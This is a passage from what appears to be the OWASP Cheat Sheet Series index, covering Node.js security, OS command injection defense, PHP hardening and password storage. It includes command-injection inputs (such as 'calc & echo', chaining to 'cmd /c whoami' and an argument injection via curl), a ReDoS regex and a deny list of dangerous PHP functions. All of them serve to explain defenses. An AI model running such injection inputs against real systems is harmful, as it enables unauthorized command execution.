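As an illustration, a sketch (assuming express; the route, helper function and config path are hypothetical) of the error-first callback convention and of forwarding asynchronous errors to express through next():

const express = require('express');\nconst fs = require('fs');\nconst app = express();\n\n// error-first callback convention: the first argument is reserved for an Error\nfunction readConfig(path, callback) {\nfs.readFile(path, 'utf8', (err, data) => {\nif (err) return callback(err); // propagate the error instead of swallowing it\ncallback(null, data);\n});\n}\n\napp.get('/config', (req, res, next) => {\nreadConfig('./config.json', (err, data) => {\nif (err) return next(err); // hand asynchronous errors to the express error middleware\nres.send(data);\n});\n});\n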

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#server-security","title":"Server Security","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately","title":"Set cookie flags appropriately","text":"

Generally, session information is sent using cookies in web applications. However, improper use of HTTP cookies can expose an application to several session management vulnerabilities. Some flags can be set for each cookie to prevent these kinds of attacks. The httpOnly, Secure and SameSite flags are very important for session cookies. The httpOnly flag prevents the cookie from being accessed by client-side JavaScript. This is an effective counter-measure against XSS attacks. The Secure flag ensures the cookie is sent only if the communication is over HTTPS. The SameSite flag can prevent cookies from being sent in cross-site requests, which helps protect against Cross-Site Request Forgery (CSRF) attacks. Apart from these, there are other flags like domain, path and expires. Setting these flags appropriately is encouraged, but they are mostly related to cookie scope rather than cookie security. Sample usage of these flags is given in the following example:

const session = require('express-session');\napp.use(session({\nsecret: 'your-secret-key',\nname: 'cookieName',\ncookie: { secure: true, httpOnly: true, path: '/user', sameSite: true}\n}));\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-appropriate-security-headers","title":"Use appropriate security headers","text":"

There are several HTTP security headers that can help you prevent some common attack vectors. The helmet package can help to set those headers:

const express = require(\"express\");\nconst helmet = require(\"helmet\");\n\nconst app = express();\n\napp.use(helmet()); // Add various HTTP headers\n

The top-level helmet function is a wrapper around 14 smaller middlewares. Below is a list of HTTP security headers covered by helmet middlewares:

app.use(helmet.hsts()); // default configuration\napp.use(\nhelmet.hsts({\nmaxAge: 123456,\nincludeSubDomains: false,\n})\n); // custom configuration\n
app.use(helmet.frameguard()); // default behavior (SAMEORIGIN)\n
app.use(helmet.xssFilter()); // sets \"X-XSS-Protection: 0\"\n

For modern browsers, it is recommended to implement a strong Content-Security-Policy, as detailed in the next section.

app.use(\nhelmet.contentSecurityPolicy({\n// the following directives will be merged into the default helmet CSP policy\ndirectives: {\ndefaultSrc: [\"'self'\"],  // default value for all directives that are absent\nscriptSrc: [\"'self'\"],   // helps prevent XSS attacks\nframeAncestors: [\"'none'\"],  // helps prevent Clickjacking attacks\nimgSrc: [\"'self'\", \"'http://imgexample.com'\"],\nstyleSrc: [\"'none'\"]\n}\n})\n);\n

As this middleware performs very little validation, it is recommended to rely on CSP checkers like CSP Evaluator instead.

app.use(helmet.noSniff());\n
const nocache = require(\"nocache\");\n\napp.use(nocache());\n

The above code sets Cache-Control, Surrogate-Control, Pragma and Expires headers accordingly.

app.use(helmet.ieNoOpen());\n
const expectCt = require('expect-ct');\napp.use(expectCt({ maxAge: 123 }));\napp.use(expectCt({ enforce: true, maxAge: 123 }));\napp.use(expectCt({ enforce: true, maxAge: 123, reportUri: 'http://example.com'}));\n
app.use(helmet.hidePoweredBy());\n

Also, you can lie about the technologies used with this header. For example, even if your application does not use PHP, you can set X-Powered-By header to seem so.

app.use(helmet.hidePoweredBy({ setTo: 'PHP 4.2.0' }));\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#platform-security","title":"Platform Security","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#keep-your-packages-up-to-date","title":"Keep your packages up-to-date","text":"

Security of your application depends directly on how secure the third-party packages you use in your application are. Therefore, it is important to keep your packages up-to-date. It should be noted that Using Components with Known Vulnerabilities is still in the OWASP Top 10. You can use OWASP Dependency-Check to see if any of the packages used in the project has a known vulnerability. Also, you can use Retire.js to check JavaScript libraries with known vulnerabilities.

Starting with version 6, npm introduced audit, which will warn about vulnerable packages:

npm audit\n

npm also introduced a simple way to upgrade the affected packages:

npm audit fix\n

There are several other tools you can use to check your dependencies. A more comprehensive list can be found in Vulnerable Dependency Management CS.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#do-not-use-dangerous-functions","title":"Do not use dangerous functions","text":"

There are some JavaScript functions that are dangerous and should only be used where necessary or unavoidable. The first example is the eval() function. This function takes a string argument and executes it as any other JavaScript source code. Combined with user input, this behavior inherently leads to a remote code execution vulnerability. Similarly, calls to child_process.exec are also very dangerous. This function acts as a bash interpreter and sends its arguments to /bin/sh. By injecting input into this function, attackers can execute arbitrary commands on the server.

In addition to these functions, some modules require special care when being used. As an example, fs module handles filesystem operations. However, if improperly sanitized user input is fed into this module, your application may become vulnerable to file inclusion and directory traversal vulnerabilities. Similarly, vm module provides APIs for compiling and running code within V8 Virtual Machine contexts. Since it can perform dangerous actions by nature, it should be used within a sandbox.

It would not be fair to say that these functions and modules should never be used; however, they should be used carefully, especially when they are used with user input. Also, there are some other functions that may render your application vulnerable.
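
Where spawning a process cannot be avoided, one commonly suggested mitigation (a sketch and illustration, not a complete defense; userSuppliedDirectory stands in for untrusted input) is child_process.execFile with an argument array, which does not invoke a shell:

const { execFile } = require('child_process');\n\nconst userSuppliedDirectory = process.argv[2] || '.'; // stands in for untrusted input\n\n// child_process.exec would pass a concatenated string to a shell; execFile does not\n// invoke a shell and keeps the binary and its arguments strictly separated\nexecFile('/bin/ls', ['-l', userSuppliedDirectory], (err, stdout) => {\nif (err) return console.error(err);\nconsole.log(stdout);\n});\n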

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#stay-away-from-evil-regexes","title":"Stay away from evil regexes","text":"

The Regular expression Denial of Service (ReDoS) is a Denial of Service attack, that exploits the fact that most Regular Expression implementations may reach extreme situations that cause them to work very slowly (exponentially related to input size). An attacker can then cause a program using a Regular Expression to enter these extreme situations and then hang for a very long time.

The Regular Expression Denial of Service (ReDoS) is a type of Denial of Service attack that uses regular expressions. Some Regular Expression (Regex) implementations cause extreme situations that make the application very slow. Attackers can use such regex implementations to cause the application to get into these extreme situations and hang for a long time. Such regexes are called evil if the application can be stuck on crafted input. Generally, these regexes are exploited by grouping with repetition and alternation with overlapping. For example, the regular expression ^(([a-z])+.)+[A-Z]([a-z])+$ can be used to specify Java class names. However, a very long string (aaaa...aaaaAaaaaa...aaaa) can also match this regular expression. There are some tools to check if a regex has a potential for causing denial of service. One example is vuln-regex-detector.
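
A small illustration of the catastrophic backtracking described above, using the same regular expression (be careful running it; the matching time grows roughly exponentially with the number of repeated characters):

const evilRegex = /^(([a-z])+.)+[A-Z]([a-z])+$/;\n\n// a long run of 'a' characters followed by a character that prevents a match\nconst craftedInput = 'a'.repeat(30) + '!';\n\nconsole.time('redos');\nevilRegex.test(craftedInput); // backtracking explodes as the input length grows\nconsole.timeEnd('redos');\n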

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#run-security-linters","title":"Run security linters","text":"

When developing code, keeping all security tips in mind can be really difficult. Also, ensuring that all team members follow these rules is nearly impossible. This is why there are Static Analysis Security Testing (SAST) tools. These tools do not execute your code, but they simply look for patterns that can contain security risks. As JavaScript is a dynamic and loosely-typed language, linting tools are really essential in the software development life cycle. The linting rules should be reviewed periodically and the findings should be audited. Another advantage of these tools is that you can add custom rules for patterns that you consider dangerous. ESLint and JSHint are commonly used SAST tools for JavaScript linting.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-strict-mode","title":"Use strict mode","text":"

JavaScript has a number of unsafe and dangerous legacy features that should not be used. In order to remove these features, ES5 included a strict mode for developers. With this mode, errors that were silent previously are thrown. It also helps JavaScript engines perform optimizations. With strict mode, previously accepted bad syntax causes real errors. Because of these improvements, you should always use strict mode in your application. In order to enable strict mode, you just need to write \"use strict\"; at the top of your code.

The following code will generate a ReferenceError: Can't find variable: y on the console, which will not be displayed unless strict mode is used:

\"use strict\";\n\nfunc();\nfunction func() {\ny = 3.14;   // This will cause an error (y is not defined)\n}\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#adhere-to-general-application-security-principles","title":"Adhere to general application security principles","text":"

This list mainly focuses on issues that are common in Node.js applications, with recommendations and examples. In addition to these, there are general security by design principles that apply to web applications regardless of technologies used in application server. You should also keep those principles in mind while developing your applications. You can always refer to OWASP Cheat Sheet Series to learn more about web application vulnerabilities and mitigation techniques used against them.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#additional-resources-about-nodejs-security","title":"Additional resources about Node.js security","text":"

Awesome Node.js Security resources

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html","title":"OS Command Injection Defense Cheat Sheet","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Command injection (or OS Command Injection) is a type of injection where software that constructs a system command using externally influenced input does not correctly neutralize the input from special elements that can modify the initially intended command.

For example, if the supplied value is:

calc\n

when typed in a Windows command prompt, the application Calculator is displayed.

However, if the supplied value has been tampered with, and now it is:

calc & echo \"test\"\n

when executed, it changes the meaning of the initial intended value.

Now, both the Calculator application and the value test are displayed.

The problem is exacerbated if the compromised process does not follow the principle of least privileges and attacker-controlled commands end up running with special system privileges that increase the amount of damage.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#argument-injection","title":"Argument Injection","text":"

Every OS Command Injection is also an Argument Injection. In this type of attack, user input can be passed as arguments while executing a specific command.

For example, if the user input is passed through an escape function to escape certain characters like &, |, ;, etc.

system(\"curl \" . escape($url));\n

which will prevent an attacker from running other commands.

However, if the attacker-controlled string contains an additional argument of the curl command:

system(\"curl \" . escape(\"--help\"))\n

Now when the above code is executed, it will show the output of curl --help.

Depending upon the system command used, the impact of an Argument injection attack can range from Information Disclosure to critical Remote Code Execution.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#primary-defenses","title":"Primary Defenses","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#defense-option-1-avoid-calling-os-commands-directly","title":"Defense Option 1: Avoid calling OS commands directly","text":"

The primary defense is to avoid calling OS commands directly. Built-in library functions are a very good alternative to OS commands, as they cannot be manipulated to perform tasks other than those they are intended to do.

For example use mkdir() instead of system(\"mkdir /dir_name\").

If there are available libraries or APIs for the language you use, this is the preferred method.
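
As a brief illustration (a sketch in Node.js, since the point is language-agnostic; dirName stands in for user-influenced input), the built-in filesystem API replaces the shell command entirely:

const fs = require('fs');\n\nconst dirName = process.argv[2] || 'reports'; // stands in for user-influenced input\n\n// Instead of exec('mkdir ' + dirName), which would let crafted input inject extra\n// shell commands, the built-in API creates the directory without invoking a shell\nfs.mkdir(dirName, { recursive: true }, (err) => {\nif (err) return console.error(err);\nconsole.log('directory created');\n});\n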

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#defense-option-2-escape-values-added-to-os-commands-specific-to-each-os","title":"Defense option 2: Escape values added to OS commands specific to each OS","text":"

TODO: To enhance.

For examples, see escapeshellarg() in PHP.

The escapeshellarg() surrounds the user input in single quotes, so if the malformed user input is something like & echo \"hello\", the final output will be like calc '& echo \"hello\"' which will be parsed as a single argument to the command calc.

Even though escapeshellarg() prevents OS Command Injection, an attacker can still pass a single argument to the command.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#defense-option-3-parameterization-in-conjunction-with-input-validation","title":"Defense option 3: Parameterization in conjunction with Input Validation","text":"

If calling a system command that incorporates user-supplied data cannot be avoided, the following two layers of defense should be used within software to prevent attacks:

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#layer-1","title":"Layer 1","text":"

Parameterization: If available, use structured mechanisms that automatically enforce the separation between data and command. These mechanisms can help provide the relevant quoting and encoding.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#layer-2","title":"Layer 2","text":"

Input validation: the values for commands and the relevant arguments should both be validated. There are different degrees of validation for the actual command and its arguments:

Note A: ensure that potentially harmful characters like the following are not part of the input:

& |  ; $ > < ` \\ ! ' \" ( )\n
"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#additional-defenses","title":"Additional Defenses","text":"

On top of primary defenses, parameterizations, and input validation, we also recommend adopting all of these additional defenses to provide defense in depth.

These additional defenses are:

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#code-examples","title":"Code examples","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#java","title":"Java","text":"

In Java, use ProcessBuilder and the command must be separated from its arguments.

Note about the Java's Runtime.exec method behavior:

There are many sites that will tell you that Java's Runtime.exec is exactly the same as C's system function. This is not true. Both allow you to invoke a new program/process.

However, C's system function passes its arguments to the shell (/bin/sh) to be parsed, whereas Runtime.exec tries to split the string into an array of words, then executes the first word in the array with the rest of the words as parameters.

Runtime.exec does NOT try to invoke the shell at any point and does not support shell metacharacters.

The key difference is that much of the functionality provided by the shell that could be used for mischief (chaining commands using &, &&, |, ||, etc, redirecting input and output) would simply end up as a parameter being passed to the first command, likely causing a syntax error or being thrown out as an invalid parameter.

Code to test the note above:

String[] specialChars = new String[]{\"&\", \"&&\", \"|\", \"||\"};\nString payload = \"cmd /c whoami\";\nString cmdTemplate = \"java -version %s \" + payload;\nString cmd;\nProcess p;\nint returnCode;\nfor (String specialChar : specialChars) {\ncmd = String.format(cmdTemplate, specialChar);\nSystem.out.printf(\"#### TEST CMD: %s\\n\", cmd);\np = Runtime.getRuntime().exec(cmd);\nreturnCode = p.waitFor();\nSystem.out.printf(\"RC    : %s\\n\", returnCode);\nSystem.out.printf(\"OUT   :\\n%s\\n\", IOUtils.toString(p.getInputStream(),\n\"utf-8\"));\nSystem.out.printf(\"ERROR :\\n%s\\n\", IOUtils.toString(p.getErrorStream(),\n\"utf-8\"));\n}\nSystem.out.printf(\"#### TEST PAYLOAD ONLY: %s\\n\", payload);\np = Runtime.getRuntime().exec(payload);\nreturnCode = p.waitFor();\nSystem.out.printf(\"RC    : %s\\n\", returnCode);\nSystem.out.printf(\"OUT   :\\n%s\\n\", IOUtils.toString(p.getInputStream(),\n\"utf-8\"));\nSystem.out.printf(\"ERROR :\\n%s\\n\", IOUtils.toString(p.getErrorStream(),\n\"utf-8\"));\n

Result of the test:

##### TEST CMD: java -version & cmd /c whoami\nRC    : 0\nOUT   :\n\nERROR :\njava version \"1.8.0_31\"\n\n##### TEST CMD: java -version && cmd /c whoami\nRC    : 0\nOUT   :\n\nERROR :\njava version \"1.8.0_31\"\n\n##### TEST CMD: java -version | cmd /c whoami\nRC    : 0\nOUT   :\n\nERROR :\njava version \"1.8.0_31\"\n\n##### TEST CMD: java -version || cmd /c whoami\nRC    : 0\nOUT   :\n\nERROR :\njava version \"1.8.0_31\"\n\n##### TEST PAYLOAD ONLY: cmd /c whoami\nRC    : 0\nOUT   :\nmydomain\\simpleuser\n\nERROR :\n

Incorrect usage:

ProcessBuilder b = new ProcessBuilder(\"C:\\DoStuff.exe -arg1 -arg2\");\n

In this example, the command together with the arguments is passed as one string, making it easy to manipulate that expression and inject malicious strings.

Correct Usage:

Here is an example that starts a process with a modified working directory. The command and each of the arguments are passed separately. This makes it easy to validate each term and reduces the risk of malicious strings being inserted.

ProcessBuilder pb = new ProcessBuilder(\"TrustedCmd\", \"TrustedArg1\", \"TrustedArg2\");\n\nMap<String, String> env = pb.environment();\n\npb.directory(new File(\"TrustedDir\"));\n\nProcess p = pb.start();\n
"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#net","title":".Net","text":"

See relevant details in the DotNet Security Cheat Sheet

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#php","title":"PHP","text":"

In PHP use escapeshellarg() or escapeshellcmd() rather than exec(), system(), passthru().

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#related-articles","title":"Related articles","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#description-of-command-injection-vulnerability","title":"Description of Command Injection Vulnerability","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#how-to-avoid-vulnerabilities","title":"How to Avoid Vulnerabilities","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#how-to-review-code","title":"How to Review Code","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#how-to-test","title":"How to Test","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#external-references","title":"External References","text":""},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html","title":"PHP Configuration Cheat Sheet","text":""},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This page is meant to help those configuring PHP and the web server it is running on to be very secure.

Below you will find information on the proper settings for the php.ini file and instructions on configuring Apache, Nginx, and Caddy web servers.

For general PHP codebase security please refer to the two following great guides:

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-configuration-and-deployment","title":"PHP Configuration and Deployment","text":""},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#phpini","title":"php.ini","text":"

Some of the following settings need to be adapted to your system, in particular session.save_path, session.cookie_path (e.g. /var/www/mysite), and session.cookie_domain (e.g. ExampleSite.com).

You should also be running PHP 7.2 or later. If running PHP 7.0 or 7.1, you will use slightly different values in a couple of places below (see the inline comments). Finally, look through the PHP Manual for a complete reference on every value in the php.ini configuration file.

You can find a copy of the following values in a ready-to-go php.ini file here.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-error-handling","title":"PHP error handling","text":"
expose_php              = Off\nerror_reporting         = E_ALL\ndisplay_errors          = Off\ndisplay_startup_errors  = Off\nlog_errors              = On\nerror_log               = /valid_path/PHP-logs/php_error.log\nignore_repeated_errors  = Off\n

Keep in mind that you need to have display_errors set to Off on a production server, and it is a good idea to review the logs frequently.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-general-settings","title":"PHP general settings","text":"
doc_root\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0/path/DocumentRoot/PHP-scripts/\nopen_basedir\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0/path/DocumentRoot/PHP-scripts/\ninclude_path\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0/path/PHP-pear/\nextension_dir\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0/path/PHP-extensions/\nmime_magic.magicfile\u00a0\u00a0\u00a0\u00a0=\u00a0/path/PHP-magic.mime\nallow_url_fopen\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\nallow_url_include\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\nvariables_order\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0\"GPCS\"\nallow_webdav_methods\u00a0\u00a0\u00a0\u00a0=\u00a0Off\nsession.gc_maxlifetime\u00a0\u00a0=\u00a0600\n

Setting the allow_url_* directives to Off prevents LFIs (Local File Inclusion) from being easily escalated to RFIs (Remote File Inclusion).

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-file-upload-handling","title":"PHP file upload handling","text":"
file_uploads\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0On\nupload_tmp_dir\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0/path/PHP-uploads/\nupload_max_filesize\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a02M\nmax_file_uploads\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a02\n

If your application does not use file uploads - say, the only data the user will enter or upload is via forms that do not require any document attachments - file_uploads should be turned Off.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-executable-handling","title":"PHP executable handling","text":"
enable_dl\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\ndisable_functions\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0system,\u00a0exec,\u00a0shell_exec,\u00a0passthru,\u00a0phpinfo,\u00a0show_source,\u00a0highlight_file, popen,\u00a0proc_open, fopen_with_path,\u00a0dbmopen,\u00a0dbase_open,\u00a0putenv,\u00a0move_uploaded_file, chdir,\u00a0mkdir,\u00a0rmdir,\u00a0chmod,\u00a0rename, filepro,\u00a0filepro_rowcount,\u00a0filepro_retrieve,\u00a0posix_mkfifo\n#\u00a0see\u00a0also:\u00a0http://ir.php.net/features.safe-mode\ndisable_classes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\n

These are dangerous PHP functions. You should disable all that you don't use.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-session-handling","title":"PHP session handling","text":"

Session settings are some of the MOST important values to concentrate on when configuring PHP. It is a good practice to change session.name to something new.

 session.save_path                = /path/PHP-session/\n session.name                     = myPHPSESSID\n session.auto_start               = Off\n session.use_trans_sid            = 0\n session.cookie_domain            = full.qualified.domain.name\n #session.cookie_path             = /application/path/\n session.use_strict_mode          = 1\n session.use_cookies              = 1\n session.use_only_cookies         = 1\n session.cookie_lifetime          = 14400 # 4 hours\n session.cookie_secure            = 1\n session.cookie_httponly          = 1\n session.cookie_samesite          = Strict\n session.cache_expire             = 30\n session.sid_length               = 256\n session.sid_bits_per_character   = 6 # PHP 7.2+\n session.hash_function\u00a0\u00a0\u00a0         =\u00a01 # PHP 7.0-7.1\n session.hash_bits_per_character\u00a0 =\u00a06 # PHP 7.0-7.1\n
"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#some-more-security-paranoid-checks","title":"Some more security paranoid checks","text":"
session.referer_check\u00a0\u00a0\u00a0=\u00a0/application/path\nmemory_limit\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a050M\npost_max_size\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a020M\nmax_execution_time\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a060\nreport_memleaks\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0On\ntrack_errors\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\nhtml_errors\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\n
"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#suhosin","title":"Suhosin","text":"

Suhosin is a patch to PHP which provides a number of hardening and security features that are not available in the default PHP build. However, Suhosin only works with PHP 5, which is unsupported and should not be used.

For PHP 7, there is Suhosin-ng, but it's in a prerelease stage, and as such should not be used in production.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#snuffleupagus","title":"Snuffleupagus","text":"

Snuffleupagus is the spiritual descendant of Suhosin for PHP 7 and onwards, with modern features. It is considered stable and is usable in production.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html","title":"Password Storage Cheat Sheet","text":""},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#introduction","title":"Introduction","text":"

It is essential to store passwords in a way that prevents them from being obtained by an attacker even if the application or database is compromised. The majority of modern languages and frameworks provide built-in functionality to help store passwords safely.

After an attacker has acquired stored password hashes, they are always able to brute force hashes offline. As a defender, it is only possible to slow down offline attacks by selecting hash algorithms that are as resource intensive as possible.

This cheat sheet provides guidance on the various areas that need to be considered related to storing passwords. In short:

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#background","title":"Background","text":""},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#hashing-vs-encryption","title":"Hashing vs Encryption","text":"

Hashing and encryption both provide ways to keep sensitive data safe. However, in almost all circumstances, passwords should be hashed, NOT encrypted.

Hashing is a one-way function (i.e., it is impossible to \"decrypt\" a hash and obtain the original plaintext value). Hashing is appropriate for password validation. Even if an attacker obtains the hashed password, they cannot enter it into an application's password field and log in as the victim.

Encryption is a two-way function, meaning that the original plaintext can be retrieved. Encryption is appropriate for storing data such as a user's address since this data is displayed in plaintext on the user's profile. Hashing their address would result in a garbled mess.

In the context of password storage, encryption should only be used in edge cases where it is necessary to obtain the original plaintext password. This might be necessary if the application needs to use the password to authenticate with another system that does not support a modern way to programmatically grant access, such as OpenID Connect (OIDC). Where possible, an alternative architecture should be used to avoid the need to store passwords in an encrypted form.

For further guidance on encryption, see the Cryptographic Storage Cheat Sheet.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#how-attackers-crack-password-hashes","title":"How Attackers Crack Password Hashes","text":"

Although it is not possible to \"decrypt\" password hashes to obtain the original passwords, it is possible to \"crack\" the hashes in some circumstances.

The basic steps are:

This process is repeated for a large number of potential candidate passwords. Different methods can be used to select candidate passwords, including:

While the number of permutations can be enormous, high-speed hardware (such as GPUs) and cloud services with many servers for rent make the cost of successfully cracking passwords relatively small for an attacker, especially when best practices for hashing are not followed.

Strong passwords stored with modern hashing algorithms and using hashing best practices should be effectively impossible for an attacker to crack. It is your responsibility as an application owner to select a modern hashing algorithm.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#password-storage-concepts","title":"Password Storage Concepts","text":""},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#salting","title":"Salting","text":"

A salt is a unique, randomly generated string that is added to each password as part of the hashing process. As the salt is unique for every user, an attacker has to crack hashes one at a time using the respective salt rather than calculating a hash once and comparing it against every stored hash. This makes cracking large numbers of hashes significantly harder, as the time required grows in direct proportion to the number of hashes.

Salting also protects against an attacker pre-computing hashes using rainbow tables or database-based lookups. Finally, salting means that it is impossible to determine whether two users have the same password without cracking the hashes, as the different salts will result in different hashes even if the passwords are the same.

Modern hashing algorithms such as Argon2id, bcrypt, and PBKDF2 automatically salt the passwords, so no additional steps are required when using them.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#peppering","title":"Peppering","text":"

A pepper can be used in addition to salting to provide an additional layer of protection. The purpose of the pepper is to prevent an attacker from being able to crack any of the hashes if they only have access to the database, for example, if they have exploited a SQL injection vulnerability or obtained a backup of the database.

One of several peppering strategies is to hash the passwords as usual (using a password hashing algorithm) and then HMAC or encrypt the hashes with a symmetric encryption key before storing the password hash in the database, with the key acting as the pepper. Peppering strategies do not affect the password hashing function in any way.
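
For illustration only, here is a minimal Python sketch of the "encrypt the hash" variant of peppering described above. The bcrypt and cryptography packages, the PEPPER_KEY environment variable, and the choice of Fernet as the symmetric cipher are assumptions made for this sketch, not requirements stated in the text.

import os
import bcrypt                            # third-party: pip install bcrypt
from cryptography.fernet import Fernet   # third-party: pip install cryptography

# Assumption: the pepper key lives outside the database (environment, KMS or HSM).
pepper = Fernet(os.environ["PEPPER_KEY"])

def store(password: str) -> bytes:
    pw_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt())  # salted hash as usual
    return pepper.encrypt(pw_hash)        # then encrypt the hash with the pepper key

def verify(password: str, stored: bytes) -> bool:
    pw_hash = pepper.decrypt(stored)      # recover the bcrypt hash
    return bcrypt.checkpw(password.encode(), pw_hash)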

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#work-factors","title":"Work Factors","text":"

The work factor is essentially the number of iterations of the hashing algorithm that are performed for each password (usually, it's actually 2^work iterations). The purpose of the work factor is to make calculating the hash more computationally expensive, which in turn reduces the speed and/or increases the cost for which an attacker can attempt to crack the password hash. The work factor is typically stored in the hash output.

When choosing a work factor, a balance needs to be struck between security and performance. Higher work factors will make the hashes more difficult for an attacker to crack but will also make the process of verifying a login attempt slower. If the work factor is too high, this may degrade the performance of the application and could also be used by an attacker to carry out a denial of service attack by making a large number of login attempts to exhaust the server's CPU.

There is no golden rule for the ideal work factor - it will depend on the performance of the server and the number of users on the application. Determining the optimal work factor will require experimentation on the specific server(s) used by the application. As a general rule, calculating a hash should take less than one second.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#upgrading-the-work-factor","title":"Upgrading the Work Factor","text":"

One key advantage of having a work factor is that it can be increased over time as hardware becomes more powerful and cheaper.

The most common approach to upgrading the work factor is to wait until the user next authenticates and then re-hash their password with the new work factor. This means that different hashes will have different work factors, and it may result in hashes never being upgraded if the user doesn't log back into the application. Depending on the application, it may be appropriate to remove the older password hashes and require users to reset their passwords the next time they need to log in, in order to avoid storing older and less secure hashes.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#password-hashing-algorithms","title":"Password Hashing Algorithms","text":"

There are a number of modern hashing algorithms that have been specifically designed for securely storing passwords. This means that they should be slow (unlike algorithms such as MD5 and SHA-1, which were designed to be fast), and how slow they are can be configured by changing the work factor.

Websites should not hide which password hashing algorithm they use. If you utilize a modern password hashing algorithm with proper configuration parameters, it should be safe to state publicly which password hashing algorithm is in use and to have it listed here.

